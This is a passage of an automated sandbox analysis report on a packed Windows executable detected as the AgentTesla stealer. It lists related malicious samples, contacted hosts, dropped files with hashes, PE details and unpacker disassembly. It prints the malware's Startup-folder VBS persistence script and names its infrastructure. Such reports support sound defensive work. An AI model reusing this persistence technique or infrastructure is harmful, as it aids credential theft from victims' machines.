                                        3FjrbCZgDN.exeGet hashmaliciousAgentTeslaBrowse
                                        • ip-api.com/line/?fields=hosting
                                        ewYjhndHg2.exeGet hashmaliciousAgentTeslaBrowse
                                        • ip-api.com/line/?fields=hosting
                                        uEuTtkxAqq.exeGet hashmaliciousAgentTeslaBrowse
                                        • ip-api.com/line/?fields=hosting
                                        0I9GLRSiy0.exeGet hashmaliciousAgentTeslaBrowse
                                        • ip-api.com/line/?fields=hosting
                                        NUGMrDcg4v.exeGet hashmaliciousAgentTeslaBrowse
                                        • ip-api.com/line/?fields=hosting
                                        LMxd0gpIxe.exeGet hashmaliciousAgentTeslaBrowse
                                        • ip-api.com/line/?fields=hosting
                                        162.241.62.63Order 122001-220 guanzo.exeGet hashmaliciousFormBookBrowse
                                        • www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7SITSAPpSF1hBU/JW21XLBQwE3Ox

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        ip-api.comLfZAz7DQzo.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        Q5QrxfKnFA.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        RHOqJ5BrHW.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        J8V6dFanEo.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        3FjrbCZgDN.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        ewYjhndHg2.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        uEuTtkxAqq.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        0I9GLRSiy0.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        NUGMrDcg4v.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        LMxd0gpIxe.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        UNIFIEDLAYER-AS-1USLfZAz7DQzo.exeGet hashmaliciousAgentTeslaBrowse
                                        • 162.241.62.63
                                        zdmZjYqz44.exeGet hashmaliciousAgentTeslaBrowse
                                        • 108.179.234.136
                                        ZeAX5i7cGB.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 50.87.139.143
                                        iNFGd6bDZX.exeGet hashmaliciousAgentTeslaBrowse
                                        • 192.254.225.136
                                        RHOqJ5BrHW.exeGet hashmaliciousAgentTeslaBrowse
                                        • 162.241.62.63
                                        ru52XOQ1p7.exeGet hashmaliciousAgentTeslaBrowse
                                        • 192.254.186.165
                                        28uMwHvbTD.exeGet hashmaliciousAgentTeslaBrowse
                                        • 162.241.62.63
                                        https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8fGet hashmaliciousHTMLPhisherBrowse
                                        • 162.241.149.91
                                        https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8fGet hashmaliciousHTMLPhisherBrowse
                                        • 162.241.149.91
                                        Bontrageroutdoors_Project_Update_202557516.pdfGet hashmaliciousUnknownBrowse
                                        • 108.179.241.236
                                        TUT-ASUSLfZAz7DQzo.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        Q5QrxfKnFA.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        RHOqJ5BrHW.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        J8V6dFanEo.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        3FjrbCZgDN.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        ewYjhndHg2.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        uEuTtkxAqq.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        0I9GLRSiy0.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        NUGMrDcg4v.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        LMxd0gpIxe.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Temp\aut290.tmp

                                        Download File
                                        Process:C:\Users\user\AppData\Local\kinematical\outvaunts.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):157558
                                        Entropy (8bit):7.885376198745657
                                        Encrypted:false
                                        SSDEEP:3072:x03XsThZf8FQpNw6OaIh/5Auxz/0b5HC3nzlbMr9otOi0fVUjP5:+3cThd8qpNw6MhxPxz/GHC35MrA30ijx
                                        MD5:9959CFF26891326E51CD32D14824413E
                                        SHA1:BB05AB1A0338183E892FC48B26567127EFF8744F
                                        SHA-256:EA37FEB15778A8EBEE55CF94D8E7DCCED0EC2813AD1B8B48EB72D28625538865
                                        SHA-512:F8CC27113B351BA778C8CACB58FC9D629191B6AE0D8D3D837FBDCF3EB316CAA8E42E8D833651CFC485EF63D150C6AF22ACAE10E4FA893A859C082B95FAD35FD1
                                        Malicious:false
                                        Reputation:low
                                        Preview:EA06.......tj.R.G.M......Q...].cL..g.ZD.F....`..A..i......g..8N%?j...X.[.tX6..e.O.Q.,.,.M.6i%^.".L.39...1.Z.U.dN.k..j....K...3..Q)Pz..$..`...M...e..Q.....],...o]".V..F.jx......`...cL..Ff..Q..V.O..Tb.A.l).....D..k..=D.....N..Z=.....0........EF......}...Z.Q...v.a.M`.....f...../...p.....*......1.^ft.<....T@?2..S.p...-T.A..IL.Q"..h`...W....Z@.G....!.........j0p...C.S>}...A....Sy.2.G.......v...[...}n[4..5.M.?a..?..,&..........d8<...6.....$........?9C..hS......r9...)...iV.....l....U.9........G#.....+...W.q.N..G......m1.Ve.x.a5.K..M.@...p...w.m.Nnv.,.X.Q....G....0.&.W...b.0.Bt..M.8....(.8$ ....)..!.-...@....."..-.....(...]...v`#....pe....=.w}.K...8.U!.VrK..g-4..N.Y.H WK..E.h..d..'..!.:k@..h.Z}n.6.m...=R.B.M&4...._.lyY.^...[..=<.5..Ae.9..F5..~.. ..i....9...@.Cm......~.J.Kj...1A..g29,.U1...X.F.!..'.8..N.........&.J...[..i.*U.....3......J..y.....^......a...S....5....kuRm6.T.....3.N`t9.*U .Mi.:..[#.`#...y&.......c1.W@..L.)P.Uj...r.y..j5.x..K.I

                                        C:\Users\user\AppData\Local\Temp\aut3306.tmp

                                        Download File
                                        Process:C:\Users\user\AppData\Local\kinematical\outvaunts.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):157558
                                        Entropy (8bit):7.885376198745657
                                        Encrypted:false
                                        SSDEEP:3072:x03XsThZf8FQpNw6OaIh/5Auxz/0b5HC3nzlbMr9otOi0fVUjP5:+3cThd8qpNw6MhxPxz/GHC35MrA30ijx
                                        MD5:9959CFF26891326E51CD32D14824413E
                                        SHA1:BB05AB1A0338183E892FC48B26567127EFF8744F
                                        SHA-256:EA37FEB15778A8EBEE55CF94D8E7DCCED0EC2813AD1B8B48EB72D28625538865
                                        SHA-512:F8CC27113B351BA778C8CACB58FC9D629191B6AE0D8D3D837FBDCF3EB316CAA8E42E8D833651CFC485EF63D150C6AF22ACAE10E4FA893A859C082B95FAD35FD1
                                        Malicious:false
                                        Reputation:low
                                        Preview:EA06.......tj.R.G.M......Q...].cL..g.ZD.F....`..A..i......g..8N%?j...X.[.tX6..e.O.Q.,.,.M.6i%^.".L.39...1.Z.U.dN.k..j....K...3..Q)Pz..$..`...M...e..Q.....],...o]".V..F.jx......`...cL..Ff..Q..V.O..Tb.A.l).....D..k..=D.....N..Z=.....0........EF......}...Z.Q...v.a.M`.....f...../...p.....*......1.^ft.<....T@?2..S.p...-T.A..IL.Q"..h`...W....Z@.G....!.........j0p...C.S>}...A....Sy.2.G.......v...[...}n[4..5.M.?a..?..,&..........d8<...6.....$........?9C..hS......r9...)...iV.....l....U.9........G#.....+...W.q.N..G......m1.Ve.x.a5.K..M.@...p...w.m.Nnv.,.X.Q....G....0.&.W...b.0.Bt..M.8....(.8$ ....)..!.-...@....."..-.....(...]...v`#....pe....=.w}.K...8.U!.VrK..g-4..N.Y.H WK..E.h..d..'..!.:k@..h.Z}n.6.m...=R.B.M&4...._.lyY.^...[..=<.5..Ae.9..F5..~.. ..i....9...@.Cm......~.J.Kj...1A..g29,.U1...X.F.!..'.8..N.........&.J...[..i.*U.....3......J..y.....^......a...S....5....kuRm6.T.....3.N`t9.*U .Mi.:..[#.`#...y&.......c1.W@..L.)P.Uj...r.y..j5.x..K.I

                                        C:\Users\user\AppData\Local\Temp\autFF64.tmp

                                        Download File
                                        Process:C:\Users\user\Desktop\toIuQILmr1.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):157558
                                        Entropy (8bit):7.885376198745657
                                        Encrypted:false
                                        SSDEEP:3072:x03XsThZf8FQpNw6OaIh/5Auxz/0b5HC3nzlbMr9otOi0fVUjP5:+3cThd8qpNw6MhxPxz/GHC35MrA30ijx
                                        MD5:9959CFF26891326E51CD32D14824413E
                                        SHA1:BB05AB1A0338183E892FC48B26567127EFF8744F
                                        SHA-256:EA37FEB15778A8EBEE55CF94D8E7DCCED0EC2813AD1B8B48EB72D28625538865
                                        SHA-512:F8CC27113B351BA778C8CACB58FC9D629191B6AE0D8D3D837FBDCF3EB316CAA8E42E8D833651CFC485EF63D150C6AF22ACAE10E4FA893A859C082B95FAD35FD1
                                        Malicious:false
                                        Reputation:low
                                        Preview:EA06.......tj.R.G.M......Q...].cL..g.ZD.F....`..A..i......g..8N%?j...X.[.tX6..e.O.Q.,.,.M.6i%^.".L.39...1.Z.U.dN.k..j....K...3..Q)Pz..$..`...M...e..Q.....],...o]".V..F.jx......`...cL..Ff..Q..V.O..Tb.A.l).....D..k..=D.....N..Z=.....0........EF......}...Z.Q...v.a.M`.....f...../...p.....*......1.^ft.<....T@?2..S.p...-T.A..IL.Q"..h`...W....Z@.G....!.........j0p...C.S>}...A....Sy.2.G.......v...[...}n[4..5.M.?a..?..,&..........d8<...6.....$........?9C..hS......r9...)...iV.....l....U.9........G#.....+...W.q.N..G......m1.Ve.x.a5.K..M.@...p...w.m.Nnv.,.X.Q....G....0.&.W...b.0.Bt..M.8....(.8$ ....)..!.-...@....."..-.....(...]...v`#....pe....=.w}.K...8.U!.VrK..g-4..N.Y.H WK..E.h..d..'..!.:k@..h.Z}n.6.m...=R.B.M&4...._.lyY.^...[..=<.5..Ae.9..F5..~.. ..i....9...@.Cm......~.J.Kj...1A..g29,.U1...X.F.!..'.8..N.........&.J...[..i.*U.....3......J..y.....^......a...S....5....kuRm6.T.....3.N`t9.*U .Mi.:..[#.`#...y&.......c1.W@..L.)P.Uj...r.y..j5.x..K.I

                                        C:\Users\user\AppData\Local\Temp\unnervousness

                                        Download File
                                        Process:C:\Users\user\Desktop\toIuQILmr1.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):245248
                                        Entropy (8bit):6.756730328929154
                                        Encrypted:false
                                        SSDEEP:6144:qV3Vtuudjjm+CMQfxZ4QkWyC9zENTiA7gGpRLo:qV3VtuTHfxZ4QkWyCBENTiygmRU
                                        MD5:BFE52729D63DC4E1D9D17CF71636FF77
                                        SHA1:451594448E8A3292016C5782EC4CD5474711C90A
                                        SHA-256:70ED8C3A103BB5402268EE205F24B77566C8CF12B7A38E9EE94FE2C844AB1835
                                        SHA-512:C3F303B7383A3A7528AF556BEFC939C227F6C5246BEB9B9FF3A5D97A537BB4D8C6DA6FC6A45FAEC5D1C8C2F489DCA788BDB792E2DC91DDA71149AB6234CB4B92
                                        Malicious:false
                                        Reputation:low
                                        Preview:.c.FUTFG26LQ..QQ.3DJKC1L.A85H9KFVTFG66LQGAQQO3DJKC1LWA85H9KF.TFG8)._G.X.n.E..be$>2.E:V,479f$WX">3a34oA1$k*_l..k.%V/#xYKM.6LQGAQQ.vDJ.B2L$.rSH9KFVTFG.6NPL@ZQO.GJKK1LWA85..HFVtFG6.OQGA.QO.DJKA1LSA85H9KFRTFG66LQGaUQO1DJKC1LUAx.H9[FVDFG66\QGQQQO3DJ[C1LWA85H9KFZ.EGy6LQG.RQ.6DJKC1LWA85H9KFVTFG66HQKAQQO3DJKC1LWA85H9KFVTFG66LQGAQQO3DJKC1LWA85H9KFVTFG6.LQOAQQO3DJKC1L_a85.9KFVTFG66LQi54);3DJ/.2LWa85H.HFVVFG66LQGAQQO3DJkC1,y3KG+9KF.QFG6.OQGGQQO.GJKC1LWA85H9KF.TF..D)=("QQC3DJKC5LWC85H.HFVTFG66LQGAQQ.3D.KC1LWA85H9KFVTFGv.OQGAQQ.3DJIC4L..:5 .JFUTFG76LWGAQQO3DJKC1LWA85H9KFVTFG66LQGAQQO3DJKC1LWA85H9KFK....o.<o[-4.l.$.O..+..@..Y.S.M"....\....l67..A.:x.._...C.YB8P.....s#:=Y)kBg6*.K.....m%...W!.>...O~./>......re....^3....G..(,\b61HY-..'054..4.PGAQQ.......>9soe:DXbF>.....sS)...5C1L3A85:9KF7TFGq6LQ(AQQ!3DJ5C1L)A85.9KF.TFG.6LQbAQQ"3DJoC1L)A85.DDI...E..QGAQQz..z..........p'.8.T....%...iA..LY. .tr..E.?..!d'Wd..VN5@OID5O[|6~...gTPBB41HRK|_...k.e..n..9.....;66LQGA.QO.DJK.L.A85.9.F..FG6..Q.A.Q..J

                                        C:\Users\user\AppData\Local\kinematical\outvaunts.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\toIuQILmr1.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                        Category:dropped
                                        Size (bytes):613376
                                        Entropy (8bit):7.93384893623813
                                        Encrypted:false
                                        SSDEEP:12288:AYV6MorX7qzuC3QHO9FQVHPF51jgcQxNAQ8d6dLOXsGdxpM8E:fBXu9HGaVHdkLO/LE
                                        MD5:9B46500828B338EB4CDA1D49BED1F791
                                        SHA1:FE2F2D5E222765E585A61F80C33B061F643E7107
                                        SHA-256:0502E71249410DBA419218374909428D7D53CCA90C3CFE8861B7F8EAE432A4B9
                                        SHA-512:5A6E39F1064F7A1DB77FE8AAB9DA039F9340630ECF1379EF28061D857908107CCC884389FDC064D13B5C80FABC417D5D4061A718465F0301E9494C8DB109E918
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 71%
                                        • Antivirus: Virustotal, Detection: 76%, Browse
                                        Reputation:low
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L....'jg.........."......p..........p.... ........@.......................................@...@.......@.....................@...$.......@...................d.......................................T...H...........................................UPX0....................................UPX1.....p... ...d..................@....rsrc................h..............@..............................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....

                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs

                                        Download File
                                        Process:C:\Users\user\AppData\Local\kinematical\outvaunts.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):284
                                        Entropy (8bit):3.4284807182449275
                                        Encrypted:false
                                        SSDEEP:6:DMM8lfm3OOQdUfclo5ZsUEZ+lX1OlTlOKl2Mu4dnriIM8lfQVn:DsO+vNlzQ1IlO8mA2n
                                        MD5:7E06A16B75B165ED34229AC07A69F329
                                        SHA1:E6C5E24217F613B277B2186B6F9D36EFFB44D525
                                        SHA-256:FC77EF6C285E85FEE2F8C1B7F10E62F58B1100620208C51ED13659BE78FEBE6C
                                        SHA-512:74F856FD40C9947BEFE53116B1E54D6C73549D8E2451310DBF1FAD9207F609E881CE00B50D20349C73D7C936704FA56011EA154B2F71E99E61266D05E0C04CAA
                                        Malicious:true
                                        Reputation:low
                                        Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.k.i.n.e.m.a.t.i.c.a.l.\.o.u.t.v.a.u.n.t.s...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                        Entropy (8bit):7.93384893623813
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.39%
                                        • UPX compressed Win32 Executable (30571/9) 0.30%
                                        • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        File name:toIuQILmr1.exe
                                        File size:613'376 bytes
                                        MD5:9b46500828b338eb4cda1d49bed1f791
                                        SHA1:fe2f2d5e222765e585a61f80c33b061f643e7107
                                        SHA256:0502e71249410dba419218374909428d7d53cca90c3cfe8861b7f8eae432a4b9
                                        SHA512:5a6e39f1064f7a1db77fe8aab9da039f9340630ecf1379ef28061d857908107ccc884389fdc064d13b5c80fabc417d5d4061a718465f0301e9494c8db109e918
                                        SSDEEP:12288:AYV6MorX7qzuC3QHO9FQVHPF51jgcQxNAQ8d6dLOXsGdxpM8E:fBXu9HGaVHdkLO/LE
                                        TLSH:F9D422C21FD1DD77C16823B9D43A9D10241AB8B0CBE53B6E8259F12EF87AB46C81615F
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                                        File Icon

                                        Icon Hash:aaf3e3e3938382a0

                                        Static PE Info

                                        General

                                        Entrypoint:0x518070
                                        Entrypoint Section:UPX1
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x676A279B [Tue Dec 24 03:16:43 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:5
                                        OS Version Minor:1
                                        File Version Major:5
                                        File Version Minor:1
                                        Subsystem Version Major:5
                                        Subsystem Version Minor:1
                                        Import Hash:fc6683d30d9f25244a50fd5357825e79

                                        Entrypoint Preview

                                        Instruction
                                        pushad
                                        mov esi, 004C2000h
                                        lea edi, dword ptr [esi-000C1000h]
                                        push edi
                                        jmp 00007FC898CCB4FDh
                                        nop
                                        mov al, byte ptr [esi]
                                        inc esi
                                        mov byte ptr [edi], al
                                        inc edi
                                        add ebx, ebx
                                        jne 00007FC898CCB4F9h
                                        mov ebx, dword ptr [esi]
                                        sub esi, FFFFFFFCh
                                        adc ebx, ebx
                                        jc 00007FC898CCB4DFh
                                        mov eax, 00000001h
                                        add ebx, ebx
                                        jne 00007FC898CCB4F9h
                                        mov ebx, dword ptr [esi]
                                        sub esi, FFFFFFFCh
                                        adc ebx, ebx
                                        adc eax, eax
                                        add ebx, ebx
                                        jnc 00007FC898CCB4FDh
                                        jne 00007FC898CCB51Ah
                                        mov ebx, dword ptr [esi]
                                        sub esi, FFFFFFFCh
                                        adc ebx, ebx
                                        jc 00007FC898CCB511h
                                        dec eax
                                        add ebx, ebx
                                        jne 00007FC898CCB4F9h
                                        mov ebx, dword ptr [esi]
                                        sub esi, FFFFFFFCh
                                        adc ebx, ebx
                                        adc eax, eax
                                        jmp 00007FC898CCB4C6h
                                        add ebx, ebx
                                        jne 00007FC898CCB4F9h
                                        mov ebx, dword ptr [esi]
                                        sub esi, FFFFFFFCh
                                        adc ebx, ebx
                                        adc ecx, ecx
                                        jmp 00007FC898CCB544h
                                        xor ecx, ecx
                                        sub eax, 03h
                                        jc 00007FC898CCB503h
                                        shl eax, 08h
                                        mov al, byte ptr [esi]
                                        inc esi
                                        xor eax, FFFFFFFFh
                                        je 00007FC898CCB567h
                                        sar eax, 1
                                        mov ebp, eax
                                        jmp 00007FC898CCB4FDh
                                        add ebx, ebx
                                        jne 00007FC898CCB4F9h
                                        mov ebx, dword ptr [esi]
                                        sub esi, FFFFFFFCh
                                        adc ebx, ebx
                                        jc 00007FC898CCB4BEh
                                        inc ecx
                                        add ebx, ebx
                                        jne 00007FC898CCB4F9h
                                        mov ebx, dword ptr [esi]
                                        sub esi, FFFFFFFCh
                                        adc ebx, ebx
                                        jc 00007FC898CCB4B0h
                                        add ebx, ebx
                                        jne 00007FC898CCB4F9h
                                        mov ebx, dword ptr [esi]
                                        sub esi, FFFFFFFCh
                                        adc ebx, ebx
                                        adc ecx, ecx
                                        add ebx, ebx
                                        jnc 00007FC898CCB4E1h
                                        jne 00007FC898CCB4FBh
                                        mov ebx, dword ptr [esi]
                                        sub esi, FFFFFFFCh
                                        adc ebx, ebx
                                        jnc 00007FC898CCB4D6h
                                        add ecx, 02h
                                        cmp ebp, FFFFFB00h
                                        adc ecx, 02h
                                        lea edx, dword ptr [edi+ebp]
                                        cmp ebp, FFFFFFFCh
                                        jbe 00007FC898CCB500h
                                        mov al, byte ptr [edx]

                                        Rich Headers

                                        Programming Language:
                                        • [ASM] VS2013 build 21005
                                        • [ C ] VS2013 build 21005
                                        • [C++] VS2013 build 21005
                                        • [ C ] VS2008 SP1 build 30729
                                        • [IMP] VS2008 SP1 build 30729
                                        • [ASM] VS2013 UPD5 build 40629
                                        • [RES] VS2013 build 21005
                                        • [LNK] VS2013 UPD5 build 40629

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x157f400x424.rsrc
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1190000x3ef40.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1583640xc.rsrc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1182540x48UPX1
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        UPX00x10000xc10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        UPX10xc20000x570000x56400cfc3cd84fc03765e36adf0b7090cd0aeFalse0.9872905344202898data7.93533599344607IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc0x1190000x400000x3f4003fe839ffa19b095a47d1be628507494bFalse0.9197751976284585data7.8778698054781655IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                        Resources

                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_ICON0x1195ac0x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                        RT_ICON0x1196d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                        RT_ICON0x1198040x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                        RT_ICON0x1199300x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                        RT_ICON0x119c1c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                        RT_ICON0x119d480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                        RT_ICON0x11abf40x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                        RT_ICON0x11b4a00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
